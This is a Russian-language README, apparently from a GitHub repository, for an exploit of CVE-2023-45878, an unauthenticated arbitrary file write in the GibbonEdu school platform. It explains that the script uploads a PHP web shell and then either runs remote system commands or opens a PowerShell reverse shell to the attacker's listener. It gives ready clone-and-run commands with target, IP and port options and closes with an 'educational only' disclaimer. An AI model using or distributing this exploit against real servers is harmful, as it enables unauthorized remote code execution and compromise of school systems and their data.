
GibbonEdu: от произвольной записи файлов к удаленному выполнению кода
Запись произвольных файлов GibbonEdu с выполнением веб-шелла
Этот репозиторий содержит эксплойт для CVE-2023-45878 — уязвимости записи произвольных файлов в GibbonEdu. Уязвимость затрагивает конечную точку rubrics_visualise_saveAjax.php и позволяет неаутентифицированному злоумышленнику загружать произвольные файлы на веб-сервер.
Этот скрипт использует уязвимость для загрузки PHP веб-шелла и может либо:
Скрипт поддерживает два режима работы:
--command (-c): Выполнить конкретную системную команду удаленно.--shell (-s): Запустить обратную оболочку PowerShell на прослушиватель атакующего.git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>
Этот скрипт предназначен только для образовательных целей. Несанкционированное использование этого эксплойта на системах без разрешения незаконно. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим эксплойтом.